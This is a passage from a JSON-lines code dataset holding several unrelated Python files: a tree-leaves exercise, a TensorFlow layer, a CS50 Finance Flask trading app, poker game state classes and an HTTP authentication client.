can link the leaves to get\na list of participants\n\nGiven a binary tree, write a function which forms a linked list\nfrom the leaves of the binary tree. 
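For example, in the tree (1 (2 (4) (5)) (3)), written as (value left right), the\nlinked list is 4 -> 5 -> 3.\n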
The leaves should appear in left to\nright order\n\nInitial thoughts:\ninorder traverse trees using a stack and link the lists\n\"\"\"\n\n# Recursive situation\n# Appending to list should be O(1) in practical implementations (pointer to tail)\n\ndef connect_leaves(node, L):\n if node:\n if not node.left and not node.right:\n L.append(node)\n else:\n connect_leaves(node.left, L)\n connect_leaves(node.right, L)\n\n","sub_path":"interview/elementsofpi/ch9/9.9.py","file_name":"9.9.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"510544077","text":"import numpy as np\n\nfrom entities.human_being import human_being\n\n\nclass simple_sampler_by_size:\n def __init__(self, sample_size):\n self.sample_size = sample_size\n\n def sample_from_humans(self, human_list):\n humans_data = []\n for human in human_list:\n shuffled_cells = human.cells_features\n sample_size = self.sample_size\n np.random.shuffle(shuffled_cells)\n humans_data.append(human_being(shuffled_cells[0:sample_size], fcs_file=human.fcs_file, file_idx=human.human_idx))\n return humans_data\n","sub_path":"samplers/simple_sampler_by_size.py","file_name":"simple_sampler_by_size.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7376363","text":"import tensorflow as tf\r\n\r\n\r\nclass Linear(tf.keras.layers.Layer):\r\n\r\n def __init__(self, units, input_dim):\r\n super(Linear, self).__init__()\r\n w_init = tf.random_normal_initializer()\r\n self.w = tf.Variable(initial_value=w_init(shape=(input_dim, units),\r\n dtype='float32'),\r\n trainable=True)\r\n b_init = tf.zeros_initializer()\r\n self.b = tf.Variable(initial_value=b_init(shape=(units,),\r\n dtype='float32'),\r\n trainable=True)\r\n\r\n def call(self, inputs):\r\n return tf.matmul(inputs, self.w) + self.b\r\n\r\n\r\nlinear_layer = Linear(4,2)\r\nprint(linear_layer(tf.ones((2, 2))))\r\nprint(linear_layer.w)\r\nprint(linear_layer.b)\r\n'''\r\ntf.Tensor(\r\n[[-0.04408899 -0.02287596 0.04922538 0.01446066]\r\n [-0.04408899 -0.02287596 0.04922538 0.01446066]], shape=(2, 4), dtype=float32)\r\n\r\n\r\n'''","sub_path":"tensorflow basics/custom_layer_with_bias.py","file_name":"custom_layer_with_bias.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"643076324","text":"import Client\n\nclass distData:\n\n def __init__(self, dist, time, angle):\n self.dist = dist\n self.time = time\n self.angle = angle\n\n def send(self):\n client = Client.Client()\n message = ';'.join([str(self.dist), str(self.time), str(self.angle)])\n print(message)\n client.SendData(message)\n\n\nif __name__ == \"__main__\":\n tmp = distData(0.5, 0, 90) \n tmp.send()\n","sub_path":"dist_sensor.py","file_name":"dist_sensor.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156360580","text":"import os\nimport datetime\nimport re\n\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session, url_for\n# cannot use in check50ch\n# from flask_mail import Mail, Message\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom itsdangerous import 
TimedJSONWebSignatureSerializer as Serializer\nfrom helpers import apology, login_required, lookup, usd\n\nTEMPLATES_AUTO_RELOAD = True\n\n# Ensure environment variable is set\nif not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n\n# Configure application\napp = Flask(__name__)\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n# app.config.from_object(__name__)\napp.config.from_pyfile(\"flask.cfg\")\n\napp.config.update(\n MAIL_SERVER=app.config['MAIL_SERVER'],\n MAIL_PORT=app.config['MAIL_PORT'],\n MAIL_USE_SSL=app.config['MAIL_USE_SSL'],\n MAIL_USERNAME=app.config['MAIL_USERNAME'],\n MAIL_PASSWORD = app.config['MAIL_PASSWORD']\n)\n# print(app.config.MAIL_SERVER)\n# print(app.config.MAIL_PORT)\n# print(app.config.MAIL_USE_SSL)\n# print(app.config.MAIL_USERNAME)\n# print(app.config.MAIL_PASSWORD)\n# Ensure responses aren't cached\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# mail = Mail(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\n# PERSONAL TOUCH - pw reset does not work with check50\n# # make token to send in emal\n# def get_reset_token(user_id, expires_sec=1800):\n# # takes in user_id and makes it a token\n# s = Serializer(app.config['SECRET_KEY'], expires_sec)\n# return s.dumps({'user_id': user_id}).decode('utf-8')\n\n# # verify the token when user clicks the link\n# def verify_reset_token(token):\n# print(f\"token:{token}\")\n# s = Serializer(app.config['SECRET_KEY'])\n# print(f\"s:{s}\")\n# try:\n# user_id = s.loads(token)['user_id']\n# user_id = user_id[0]['id']\n# print(f\"user_id:{user_id}\")\n# except:\n# return None\n# # get back user id and verify it is correct\n# return db.execute(\"SELECT id from USERS where id=(:user_id)\", user_id=user_id)\n\n\n# # reset instructions learned here- https://www.youtube.com/watch?v=vutyTx7IaAI\n# @app.route(\"/reset_password\", methods=['GET', 'POST'])\n# def reset_request():\n# # form = ContactForm()\n# if request.method == 'GET':\n# return render_template('reset_password.html')\n# elif request.method == 'POST':\n# if not request.form.get(\"email\"):\n# return apology(\"must provide email\", 400)\n# # check that is email syntax\n# email = request.form.get(\"email\")\n# if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n# flash(\"Not valid email syntax\")\n# # # get email from form\n# return render_template(\"reset_password.html\")\n# # # check DB for email\n# email_check = db.execute(\"SELECT email FROM users WHERE email=(:email)\", email=email)\n# print(f\"email_check: {email_check}\")\n# user_id = db.execute(\"SELECT id FROM users WHERE email=(:email)\", email=email)\n# token = get_reset_token(user_id)\n# # check if user in db\n# if email_check != [] and email_check != None:\n# verify = verify_reset_token(token)\n# # print(f\"verify: {verify}\")\n# msg = Message(\"This is an automated email for resetting your password\",\n# sender=app.config['MAIL_USERNAME'],\n# recipients=[email])\n# msg.body = f'''Click on the link to reset your password.\n# {url_for('reset_token', 
token=token, _external=True)}\n\n# If you did not request this email, ignore it.\n# '''\n# mail.send(msg)\n# flash(\"email sent\")\n# else:\n# flash(\"That email is not registred\")\n# return render_template(\"reset_password.html\")\n\n# @app.route(\"/password_reset/\", methods=['GET', 'POST'])\n# def reset_token(token):\n# # call verify token- return user\n# user = verify_reset_token(token)\n# user_id = user[0]['id']\n# if request.method == 'GET':\n# if not user:\n# flash(\"That is an invalid/Expired token.\", 'error')\n# return render_template(\"reset_password.html\")\n# # return redirect(url_for(\"reset_password\"))\n# # return redirect(url_for(\"index\"))\n# return render_template(\"password_token.html\", token=token)\n# elif request.method == 'POST':\n# if not request.form.get(\"password\"):\n# return apology(\"must provide new password\", 400)\n# elif not request.form.get(\"password\"):\n# return apology(\"must provide confrimation password\", 400)\n# elif request.form.get(\"password\") != request.form.get(\"confirmation\"):\n# return apology(\"new passwords must match\", 400)\n# else:\n# try:\n# # # # generate new password hash\n# hash = generate_password_hash(request.form.get(\"password\"), method='pbkdf2:sha256', salt_length=8)\n# db.execute(\"UPDATE users SET hash=(:hash) WHERE id=(:user_id)\", hash=hash, user_id=user_id)\n# flash(\"Password changed\")\n# return render_template(\"login.html\")\n\n# except:\n# raise ValueError (\"An error occured on hash entry\")\n# flash(\"An error occured\")\n# return render_template(\"login.html\")\n\n\"\"\"Show portfolio of stocks\"\"\"\n@app.route(\"/\")\n@login_required\ndef index():\n user_id = session['user_id']\n # select all assets\n assetData = db.execute(\"SELECT * FROM assets WHERE user_id=(:user_id)\", user_id=user_id)\n # select cash\n cash = db.execute(\"SELECT cash FROM users WHERE id=(:id)\", id=user_id)\n cash = cash[0]['cash']\n # loop through data and round all the totals\n for datum in assetData:\n # round and add usd\n datum['total'] = usd(round(datum['total'],2))\n # add usd\n cash = usd(round(cash, 2))\n return render_template(\"index.html\", data=assetData, cash=cash)\n\n\n# return the purchase ID for buy and sell\ndef purchaseID():\n last_purchase_id = db.execute(\"SELECT MAX(purchase_id) from purchases\")\n # extract from list and dict\n last_purchase_id = last_purchase_id[0]['MAX(purchase_id)']\n # if no IDs, make first = 1\n if last_purchase_id == None:\n # print(\"no ids yet, set to one\")\n current_purchase_id = 1\n # add one to get id for this purchase\n elif last_purchase_id != None:\n # print('ids there. 
increment')\n current_purchase_id = last_purchase_id + 1\n # print(f\"last id:{last_purchase_id}\")\n # print(f\"current id:{current_purchase_id}\")\n return current_purchase_id\n\n\n\"\"\"Buy shares of stock\"\"\"\n@app.route(\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n user_id = session['user_id']\n if request.method == 'POST':\n if not request.form.get(\"symbol\") or not request.form.get('shares'):\n return apology(\"Must fill in both fields.\", 400)\n else:\n # get form values\n symbol = request.form.get(\"symbol\")\n symbol = symbol.upper()\n shares = request.form.get(\"shares\")\n # error handling - fraction/decimals return ValueError\n try:\n shares = int(shares)\n if shares < 0:\n return apology(\"Cannot purchase negative shares.\", 400)\n except ValueError:\n # print(\"Could not convert\")\n return apology(\"Only integers a can be entered.\", 400)\n # get API INFO\n look_up = lookup(symbol)\n # print(f\"lookup:{look_up}\")\n if look_up == None:\n return apology(\"Not a valid ticker symbol.\", 400)\n elif look_up != None:\n price = look_up['price']\n # get users cash\n cash = db.execute(\"SELECT cash FROM users WHERE (:id)=id\", id=user_id)\n cash = cash[0]['cash']\n # print(f\"cash: {cash}\")\n # calculate total price of shares\n sharesValue = price * shares\n # see if user has the money\n cash_after_shares = cash - sharesValue\n if cash_after_shares >= 0:\n current_purchase_id = purchaseID()\n # get date\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n # print(f\"date: {current_date}\")\n # print(f\"shares: {shares}\")\n # print(f\"symbol: {symbol}\")\n # print(f\"price: {price}\")\n # print(f\"sharesValue: {sharesValue}\")\n # print(f\"user_id: {user_id}\")\n # print(f\"date: {current_date}\")\n # print(f\"purchase_id: {current_purchase_id}\")\n # CHECK if user has that stock already\n check = db.execute(\"SELECT symbol FROM purchases WHERE symbol=(:symbol)\", symbol=symbol)\n # not already in table\n # print(f\"check: {check}\")\n if check == []:\n # print(\"Symbol not there. Add to both tables\")\n # INSERT - insert new row with all purchase table\n db.execute(\"INSERT INTO purchases (user_id, shares, symbol, purchase_id, value, date, share_value, type) VALUES (:user_id, :shares, :symbol, :purchase_id, :value,:date, :share_value, :type)\", user_id=user_id, shares=shares, symbol=symbol,purchase_id=current_purchase_id, value=sharesValue,date=current_date, share_value=price, type=\"buy\")\n # INSERT - insert new row into assets table\n db.execute(\"INSERT INTO assets (user_id, symbol, shares, total) VALUES (:user_id, :symbol, :shares, :value)\", user_id=user_id, shares=shares, symbol=symbol, value=sharesValue)\n # update user cash after purchase\n db.execute(\"UPDATE users SET cash=(:cash) WHERE id=(:user_id)\", cash=cash_after_shares,user_id=user_id)\n # flash on success\n flash(\"New stock added.\")\n # redirect to index\n return redirect(url_for(\"index\"))\n else:\n # print('Symnol there. 
Add to purchase, update assets.')\n # INSERT - insert new row into purchase table\n db.execute(\"INSERT INTO purchases (user_id, shares, symbol, purchase_id, value, date, share_value, type) VALUES (:user_id, :shares, :symbol, :purchase_id, :value,:date, :share_value, :type)\", user_id=user_id, shares=shares, symbol=symbol,purchase_id=current_purchase_id, value=sharesValue,date=current_date, share_value=price, type=\"buy\")\n # SELECT - current valuees from assets\n # get shares and value already there\n currentValues = db.execute(\"SELECT shares, total FROM assets WHERE user_id=(:user_id)\", user_id=user_id)\n #UPDATE - update the assets table\n # returns a list - get dict out of list\n currentValues = currentValues[0]\n currentShares = currentValues['shares']\n currentTotal = currentValues['total']\n # add new vals to old ones\n newShares = currentShares + shares\n newTotal = currentTotal + sharesValue\n db.execute(\"UPDATE assets SET shares=(:shares), total=(:total) WHERE symbol=(:symbol) AND user_id=(:user_id)\", shares=newShares, total=newTotal, symbol=symbol, user_id=user_id)\n # UPDATE user cash after purchase\n db.execute(\"UPDATE users SET cash=(:cash) WHERE id=(:user_id)\", cash=cash_after_shares,user_id=user_id)\n # FLASH\n flash(\"New stocks added, or combined with others of the same type.\")\n # redirect to index\n return redirect(url_for(\"index\"))\n # purchase not approved\n else:\n # FLASH\n # print(\"insufficient funds\")\n return redirect(url_for(\"index\"))\n # GET REQUEST\n elif request.method == \"GET\":\n return render_template(\"buy.html\", method=request.method)\n else:\n return apology(\"Request must be a GET or a POST\", 400)\n\n\n\"\"\"Show history of transactions\"\"\"\n@app.route(\"/history\")\n@login_required\ndef history():\n user_id = session['user_id']\n purchaseData = db.execute(\"SELECT symbol, shares, value, date FROM purchases WHERE user_id=(:user_id)\", user_id=user_id)\n # loop over shares vals to round numbers\n for datum in purchaseData:\n if(datum['value'] > 0):\n datum['value'] = round(datum['value'],2)\n else:\n datum['value'] = datum['value']\n # call usd\n datum['value'] = usd(datum['value'])\n\n return render_template(\"history.html\", data=purchaseData)\n\n\n# VERSION for use with PW func\n# @app.route(\"/login\", methods=[\"GET\", \"POST\"])\n# def login():\n# # Forget any user_id\n# session.clear()\n\n# # User reached route via POST (as by submitting a form via POST)\n# if request.method == \"POST\":\n\n# # Ensure email was submitted\n# if not request.form.get(\"email\"):\n# return apology(\"must provide email\", 403)\n\n# # Ensure password was submitted\n# elif not request.form.get(\"password\"):\n# return apology(\"must provide password\", 403)\n\n# # Query database for email\n# rows = db.execute(\"SELECT * FROM users WHERE email = :email\",\n# email=request.form.get(\"email\"))\n\n# # Ensure email exists and password is correct\n# if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n# return apology(\"invalid email and/or password\", 403)\n\n# # Remember which user has logged in\n# session[\"user_id\"] = rows[0][\"id\"]\n# # print('login successful')\n\n# # Redirect user to home page\n# return redirect(\"/\")\n\n# # User reached route via GET (as by clicking a link or via redirect)\n# else:\n# return render_template(\"login.html\")\n\n\"\"\"Log user in\"\"\"\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n # Forget any user_id\n session.clear()\n\n # User reached route via 
POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure email was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 403)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 403)\n\n # Query database for email\n rows = db.execute(\"SELECT * FROM users WHERE email = :email\",\n email=request.form.get(\"username\"))\n\n # Ensure email exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid email and/or password\", 403)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n # print('login successful')\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\n\"\"\"Get stock quote.\"\"\"\n@app.route(\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n if request.method == 'POST':\n if not request.form.get(\"symbol\"):\n return apology(\"Form cannot be blank.\", 400)\n else:\n symbol = request.form.get(\"symbol\")\n symbol = symbol.upper()\n result = lookup(symbol)\n if result == None:\n return apology(\"Not a valid ticker symbol.\", 400)\n else:\n # run price through usd function\n result['price'] = usd(result['price'])\n return render_template(\"quote.html\", quote=result, method=request.method)\n elif request.method == 'GET':\n return render_template(\"quote.html\", method=request.method)\n\n\n# VERSION for if PW reset is turned on\n# @app.route(\"/register\", methods=[\"GET\", \"POST\"])\n# def register():\n# # user GET, then just render template\n# if request.method == \"POST\":\n# if not request.form.get(\"email\"):\n# return apology(\"must provide email\", 400)\n# if not request.form.get(\"password\"):\n# return apology(\"must provide password\", 400)\n# elif request.form.get(\"password\") != request.form.get(\"confirmation\"):\n# return apology(\"passwords must match\", 400)\n\n# email = request.form.get(\"email\")\n# # # generate password hash\n# hash = generate_password_hash(request.form.get(\"password\"), method='pbkdf2:sha256', salt_length=8)\n# # check that is email syntax\n# if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n# flash(\"Not valid email syntax\")\n# return render_template(\"register.html\")\n# email_query = db.execute(\"SELECT email FROM users WHERE email=(:email)\", email=email)\n# if email_query != []:\n# return apology(\"That email already exists. 
Choose another.\", 400)\n\n# db.execute(\"INSERT INTO users (email,hash) VALUES (:email, :hash)\", email=email, hash=hash)\n# user_id = db.execute(\"SELECT id FROM users WHERE email=(:email)\", email=email)\n# session[\"user_id\"] = user_id\n# flash(\"You are registed.\")\n# return render_template(\"index.html\")\n\n# elif request.method == \"GET\":\n# return render_template('register.html')\n# else:\n# return \"Request type not valid\"\n\n\"\"\"Register user\"\"\"\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n # user GET, then just render template\n if request.method == \"POST\":\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 400)\n if not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n elif request.form.get(\"password\") != request.form.get(\"confirmation\"):\n return apology(\"passwords must match\", 400)\n\n email = request.form.get(\"username\")\n # # generate password hash\n hash = generate_password_hash(request.form.get(\"password\"), method='pbkdf2:sha256', salt_length=8)\n # # check that is email syntax\n # if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n # flash(\"Not valid email syntax\")\n # return render_template(\"register.html\")\n email_query = db.execute(\"SELECT email FROM users WHERE email=(:email)\", email=email)\n if email_query != []:\n return apology(\"That email already exists. Choose another.\", 400)\n\n db.execute(\"INSERT INTO users (email,hash) VALUES (:email, :hash)\", email=email, hash=hash)\n user_id = db.execute(\"SELECT id FROM users WHERE email=(:email)\", email=email)\n session[\"user_id\"] = user_id\n flash(\"You are registed.\")\n return render_template(\"index.html\")\n\n elif request.method == \"GET\":\n return render_template('register.html')\n else:\n return \"Request type not valid\"\n\n\n\"\"\"Sell shares of stock\"\"\"\n@app.route(\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n # print('SELL')\n user_id = session['user_id']\n # get value in assets\n assets = db.execute(\"SELECT * FROM assets WHERE user_id=(:user_id)\", user_id=user_id)\n if request.method == 'GET':\n return render_template(\"sell.html\", data=assets)\n elif request.method == 'POST':\n # get input symbol\n symbol = request.form.get(\"symbol\")\n # get input shares to sell\n shares_to_sell = request.form.get(\"shares\")\n # print(f\"symbol:{symbol}\")\n # print(f\"shares_to_sell:{shares_to_sell}\")\n # input must be a string\n # if type(shares_to_sell) != str:\n try:\n # convert to int\n shares_to_sell = int(shares_to_sell)\n except ValueError:\n flash(\"Error: Input is invalid or empty\")\n return render_template(\"sell.html\", data=assets)\n\n # get shares cuurent in table\n sharesData = db.execute(\"SELECT shares FROM assets WHERE symbol=(:symbol) AND user_id=(:user_id)\", user_id=user_id, symbol=symbol)\n sharesData = sharesData[0]['shares']\n # current amount minus ones sehling\n new_shares_amount = sharesData - shares_to_sell\n # print(f\"symbol:{symbol}\")\n # print(f\"shares_to_sell:{shares_to_sell}\")\n # print(f\"current shares: {sharesData}\")\n # print(f\"new_shares_amount:{new_shares_amount}\")\n # lookup share value at API to get price\n look_up = lookup(symbol)\n look_up_price = look_up['price']\n # print(f\"price:{look_up_price}\")\n # value of sold shares - number sold * price each\n selling_cash = look_up_price * shares_to_sell\n if new_shares_amount < 0:\n # print(\"Don't have that many shares\")\n return apology(\"Not enough shares\", 
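# register() above stores db.execute()'s return value straight into the
# session, but db.execute() returns a list of rows, so session["user_id"]
# becomes [{'id': ...}] rather than the id itself (login() does it correctly
# with rows[0]["id"]); "registed" in the flash message is also a typo for
# "registered". The hashing round-trip it relies on, in isolation:
from werkzeug.security import generate_password_hash, check_password_hash

pw_hash = generate_password_hash("s3cret", method="pbkdf2:sha256", salt_length=8)
assert check_password_hash(pw_hash, "s3cret")
assert not check_password_hash(pw_hash, "wrong")
# After the INSERT, extract the scalar id before storing it:
#   rows = db.execute("SELECT id FROM users WHERE email=(:email)", email=email)
#   session["user_id"] = rows[0]["id"]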
400)\n else:\n # insert trans into purchases table\n current_purchase_id = purchaseID()\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n db.execute(\"INSERT INTO purchases (user_id, shares, symbol, purchase_id, value, date, share_value, type) VALUES (:user_id, :shares, :symbol, :purchase_id, :value,:date, :share_value, :type)\", user_id=user_id, shares=(shares_to_sell * -1), symbol=symbol,purchase_id=current_purchase_id, value=(selling_cash * -1), date=current_date, share_value=look_up_price, type=\"sell\")\n # change share number in table\n db.execute(\"UPDATE assets SET shares=(:new_shares_amount) WHERE symbol=(:symbol) AND user_id=(:user_id)\", new_shares_amount=new_shares_amount, user_id=user_id, symbol=symbol)\n # change total value - multiply remaining shares * price\n currentTotal = db.execute(\"SELECT total FROM assets WHERE symbol=(:symbol) AND user_id=(:user_id)\", user_id=user_id, symbol=symbol)\n new_total = new_shares_amount * look_up_price\n # print(f\"currentTotal:{currentTotal}\")\n # print('new_shares_amount * look_up_price = new_total')\n # print(f\"new_total: {new_total}\")\n db.execute(\"UPDATE assets SET total=(:new_total) WHERE user_id=(:user_id) AND symbol=(:symbol)\", new_total=new_total, user_id=user_id, symbol=symbol)\n # get current cash\n current_cash = db.execute(\"SELECT cash FROM users WHERE id=(:user_id)\", user_id=user_id)\n current_cash = current_cash[0]['cash']\n # print(f\"current_cash: {current_cash}\")\n # perform addition\n updated_cash = current_cash + selling_cash\n # print(f\"updated_cash:{updated_cash}\")\n # update cash\n db.execute(\"UPDATE users SET cash=(:updated_cash) WHERE id=(:user_id)\", updated_cash=updated_cash, user_id=user_id)\n flash(\"Stocks sold\")\n return redirect(url_for(\"index\"))\n\n return render_template(\"sell.html\")\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n print(e)\n return\n\n\n# listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n\n","sub_path":"pset7/finance/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":24449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"134567900","text":"# coding=utf-8\nfrom uuid import uuid4\n\nfrom client_logging import LogLevel\n\n\nclass PokerGame:\n \"\"\"This helper class encapsulates the state of a poker game.\"\"\"\n ACTION = 'action'\n DEALT_CARD = 'dealt_card'\n FROM = 'ident'\n CARD_REVEAL = 'card_reveal'\n\n def __init__(self, max_players=3, blind=10):\n self.max_players = max_players\n self.blind = blind\n self.starting_cash = 200\n self.state_log = []\n self.dealer = 0\n self.last_raise = None\n\n def advance_to_next_dealer(self):\n # This code can be used in games where the\n # dealer moves *during* play.\n if self.dealer == self.max_players:\n self.dealer = 0\n else:\n self.dealer += 1\n\n def new_raise(self) -> str:\n self.last_raise = str(uuid4())\n return self.last_raise\n\n\nclass PokerPlayer:\n \"\"\"This class encapsulates the state of a player in the poker game \"\"\"\n POKER_PLAYER = 'poker_player'\n\n def __init__(self, ident, game: PokerGame):\n self.ident = ident\n self.game = game\n self.folded = False\n self.cash_in_hand = game.starting_cash\n self.cash_in_pot = 0\n self.did_play_blind_this_round = False\n self.last_raise_i_have_called = None\n self.hand = []\n self.winnings = 0\n\n def __str__(self):\n return \"Player: {},\\tCash in hand: {}, \\tCash in pot {}\".format(self.ident,\n 
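# errorhandler() above prints the exception and returns None, which Flask
# rejects as an invalid response, so every handled error turns into a second
# 500. The conventional fix -- a sketch reusing this app's own apology()
# helper -- converts everything to an HTTPException first:
from werkzeug.exceptions import HTTPException, InternalServerError

def errorhandler(e):
    """Render an apology page for any registered error code."""
    if not isinstance(e, HTTPException):
        e = InternalServerError()
    return apology(e.name, e.code)  # apology() is defined in this app's helpers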
self.cash_in_hand,\n self.cash_in_pot)\n\n @property\n def is_all_in(self):\n return self.cash_in_hand == 0\n\n def add_to_pot(self, amount: int) -> bool:\n if self.cash_in_hand >= amount:\n self.cash_in_hand -= amount\n self.cash_in_pot += amount\n return True\n raise ValueError(\"Tried to add more to pot than possible!\")\n\n def reset_blind_flag(self):\n self.did_play_blind_this_round = False\n\n def set_blind(self, logging_func, big_blind=True):\n self.did_play_blind_this_round = True\n if big_blind:\n\n self.game.state_log.append({\n PokerGame.FROM: self.ident,\n PokerGame.ACTION: BettingCodes.BIG_BLIND\n })\n logging_func(\n LogLevel.INFO,\n \"Player {} plays BIG blind\".format(\n self.ident))\n\n if self.cash_in_hand < self.game.blind * 2:\n logging_func(LogLevel.INFO, \"Going ALL IN for blind\")\n self.add_to_pot(self.cash_in_hand)\n else:\n self.add_to_pot(self.game.blind * 2)\n self.game.new_raise()\n else:\n self.game.state_log.append({\n PokerGame.FROM: self.ident,\n PokerGame.ACTION: BettingCodes.SMALL_BLIND\n })\n logging_func(\n LogLevel.INFO,\n \"Player {} plays SMALL blind\".format(\n self.ident))\n if self.cash_in_hand < self.game.blind:\n logging_func(LogLevel.INFO, \"^^ goes ALL IN for blind\")\n self.add_to_pot(self.cash_in_hand)\n else:\n self.add_to_pot(self.game.blind)\n\n\nfresh_deck = list(range(10, 62))\n\n\nclass PokerWords:\n WINNINGS = 'winnings'\n OPEN_CARDS = 'open_cards'\n HAND = 'hand'\n DECK_STATE = 'deck_state'\n SHUFFLE_PLAYERS = 'shuffle_players'\n CRYPTODECK_STATE = 'crypto_deck_state'\n\n\nclass BettingCodes:\n CALL = 'call'\n BET = 'bet'\n FOLD = 'fold'\n ALLIN = 'all_in'\n SKIP = 'skip'\n BIG_BLIND = 'big_blind'\n SMALL_BLIND = 'small_blind'\n","sub_path":"poker_rounds/poker_game.py","file_name":"poker_game.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348502470","text":"from dataclasses import dataclass, field\nfrom typing import Optional\n\nfrom pinject import annotate_arg\nfrom requests import Session\n\nfrom ..common.clients import HTTPServiceResponse, HTTPStatus\n\n\n@dataclass\nclass User:\n id: str\n email: Optional[str]\n created_at: Optional[str]\n updated_at: Optional[str]\n\n @staticmethod\n def from_response(user=None):\n if not user:\n return User()\n return User(\n id=user.get(\"id\"),\n email=user.get(\"email\"),\n created_at=user.get(\"createdAt\"),\n updated_at=user.get(\"updatedAt\"),\n )\n\n\nclass AuthService:\n PROTOCOL = \"http://\"\n LOGIN_ENDPOINT = \"/auth/login\"\n LOGIN_WITH_TOKEN_ENDPOINT = \"/auth/login-with-token\"\n REGISTER_ENDPOINT = \"/auth/register\"\n VALIDATE_TOKEN_ENDPOINT = \"/auth/validate-token\"\n\n @annotate_arg(\"hostport\", with_annotation=\"AUTH_SERVICE_HOSTPORT\")\n def __init__(self, hostport, http_conn_pool=None):\n self.hostport = hostport\n self.http_conn_pool = Session() if not http_conn_pool else http_conn_pool\n\n def login(self, email, password):\n login_response = self.http_conn_pool.post(\n self._build_url(self.LOGIN_ENDPOINT),\n json={\"email\": email, \"password\": password},\n )\n if login_response.status_code in (\n HTTPStatus.BAD_REQUEST,\n HTTPStatus.UNAUTHORIZED,\n ):\n return HTTPServiceResponse(status=login_response.status_code)\n\n data = login_response.json()\n user = User.from_response(data.get(\"user\"))\n tokens = data.get(\"tokens\", {})\n return HTTPServiceResponse({\"user\": user, \"tokens\": tokens})\n\n def login_with_token(self, token):\n login_response = 
self.http_conn_pool.post(\n self._build_url(self.LOGIN_WITH_TOKEN_ENDPOINT), json={\"token\": token}\n )\n if login_response.status_code in (\n HTTPStatus.BAD_REQUEST,\n HTTPStatus.UNAUTHORIZED,\n ):\n return HTTPServiceResponse(status=login_response.status_code)\n\n data = login_response.json()\n user = User.from_response(data.get(\"user\"))\n tokens = data.get(\"tokens\", {})\n return HTTPServiceResponse({\"user\": user, \"tokens\": tokens})\n\n def register(self, full_name, email, password):\n register_response = self.http_conn_pool.post(\n self._build_url(self.REGISTER_ENDPOINT),\n json={\"full_name\": full_name, \"email\": email, \"password\": password},\n )\n if register_response.status_code in (\n HTTPStatus.BAD_REQUEST,\n HTTPStatus.UNAUTHORIZED,\n ):\n return HTTPServiceResponse(status=register_response.status_code)\n\n data = register_response.json()\n user = User.from_response(data.get(\"user\"))\n tokens = data.get(\"tokens\", {})\n return HTTPServiceResponse({\"user\": user, \"tokens\": tokens})\n\n def validate_token(self, token):\n is_valid = self.http_conn_pool.get(\n self._build_url(self.VALIDATE_TOKEN_ENDPOINT),\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n if is_valid.status_code in (HTTPStatus.BAD_REQUEST, HTTPStatus.UNAUTHORIZED):\n return HTTPServiceResponse(status=is_valid.status_code)\n\n user = User.from_response(is_valid.json())\n return HTTPServiceResponse(user)\n\n def _build_url(self, endpoint):\n host = self.hostport[0]\n port = self.hostport[1]\n return 